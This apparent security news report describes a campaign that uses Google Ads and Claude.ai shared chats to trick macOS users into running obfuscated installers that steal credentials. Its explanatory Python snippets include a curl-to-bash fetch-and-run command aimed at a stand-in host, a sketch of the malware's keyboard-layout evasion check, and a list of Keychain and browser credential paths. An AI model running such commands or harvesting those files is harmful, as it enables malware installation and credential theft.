BotBeat

Anthropic
INDUSTRY REPORT · 2026-05-11

Attackers Weaponize Claude.ai Shared Chats to Deliver macOS Malware in Active Campaign

Key Takeaways

  • Legitimate platforms like Claude.ai are being weaponized for malware delivery through shared chat features that appear in search results
  • The malware employs advanced evasion techniques, including polymorphic payloads, in-memory execution, and victim profiling before payload delivery
  • The campaign combines Google Ads malvertising with social engineering to gain credibility, bypassing traditional URL reputation checks
Source: Hacker News (https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/)

Summary

A sophisticated malware campaign is leveraging Google Ads and Claude.ai's shared chat feature to deliver macOS infostealer malware to unsuspecting users. Attackers have created malicious Claude.ai shared chats disguised as official "Claude Code on Mac" installation guides, targeting users searching for Claude downloads. When users follow the instructions in these chats, they unknowingly execute obfuscated shell scripts that download and execute malware on their machines.
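Obfuscated installer one-liners of this kind usually hide the real download command behind an encoding layer so the text a victim pastes looks opaque. A minimal sketch of how an analyst might unwrap such a layer; the wrapped command and domain here are hypothetical stand-ins, not taken from the actual samples:

```python
import base64

# Hypothetical payload command an attacker might hide (defanged example domain)
command = "curl -fsSL https://example.com/install.sh | bash"

# A common wrapping scheme: echo <b64> | base64 -d | bash
obfuscated = base64.b64encode(command.encode()).decode()

# An analyst reverses the encoding layer to recover the real command
recovered = base64.b64decode(obfuscated).decode()
assert recovered == command
print(recovered)
```

In a polymorphic campaign like the one described, the server would re-encode or re-randomize this wrapper on every request, so no two downloads hash the same.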

The campaign demonstrates advanced evasion techniques, including polymorphic delivery (unique obfuscation on each request) and in-memory execution to avoid leaving obvious traces on disk. Security researchers identified at least two separate campaigns using identical social engineering approaches but distinct attacker infrastructure, indicating this is an active and evolving threat. One variant includes victim profiling that checks for Russian or CIS-region keyboard configurations and skips execution if detected, suggesting operators are being selective about targets.
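The geographic-profiling gate described above is a common infostealer pattern: enumerate the host's keyboard layouts and abort if a Russian or CIS layout is present. A simplified sketch of that decision logic; the layout identifiers and helper function are illustrative, not recovered from the actual samples:

```python
# Layout identifiers commonly associated with RU/CIS locales (illustrative subset)
CIS_LAYOUTS = {"Russian", "RussianWin", "Ukrainian", "Byelorussian", "Kazakh"}

def should_skip_execution(installed_layouts: list[str]) -> bool:
    """Mimic the malware's gate: bail out if any CIS layout is installed.

    On macOS the real check would read the enabled input sources from the
    com.apple.HIToolbox preferences; here the list is passed in for clarity.
    """
    return any(layout in CIS_LAYOUTS for layout in installed_layouts)

assert should_skip_execution(["U.S.", "Russian"]) is True
assert should_skip_execution(["U.S.", "British"]) is False
```

Checks like this are cheap for attackers and double as an anti-analysis trick, since many sandboxes run with a single default layout.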

The malware variants steal sensitive data including browser credentials, cookies, and macOS Keychain contents before exfiltrating them to attacker-controlled servers. This campaign is particularly effective because the legitimate destination URL (claude.ai) provides authenticity—users see a real, verified link in Google search results, making the social engineering attack more credible.
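The data classes listed above map to well-known on-disk locations that macOS infostealers routinely harvest, which gives defenders a starting point for triage. A sketch of such a checklist; the paths are the standard locations (exact browser paths vary by version) and the helper name is ours:

```python
from pathlib import Path

# Standard macOS locations for the data classes named in the report
THEFT_TARGETS = {
    "keychain": "~/Library/Keychains/login.keychain-db",
    "chrome_logins": "~/Library/Application Support/Google/Chrome/Default/Login Data",
    "chrome_cookies": "~/Library/Application Support/Google/Chrome/Default/Cookies",
    "firefox_profiles": "~/Library/Application Support/Firefox/Profiles",
}

def expand_targets() -> dict[str, Path]:
    """Expand each target to an absolute path for use in triage tooling."""
    return {name: Path(p).expanduser() for name, p in THEFT_TARGETS.items()}

for name, path in expand_targets().items():
    print(f"{name}: {path}")
```

Unified log entries or EDR telemetry showing unexpected reads of these paths by an unsigned process are a strong indicator of this class of stealer.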

  • Multiple threat actors are running similar campaigns with identical approaches but separate infrastructure, indicating a broader trend in targeted malware distribution

Editorial Opinion

This campaign exposes a critical blind spot in how legitimate platforms protect their shared features from weaponization. Claude.ai's shared chats appear in search results and are inherently trustworthy because they're hosted on authentic Anthropic infrastructure—creating a perfect vector for attackers seeking credibility. Anthropic and similar AI platforms need urgent improvements in content monitoring, access controls, and search visibility policies for shared content to prevent their own platforms from becoming unwitting malware distribution networks.

Cybersecurity · Privacy & Data · Misinformation & Deepfakes

© 2026 BotBeat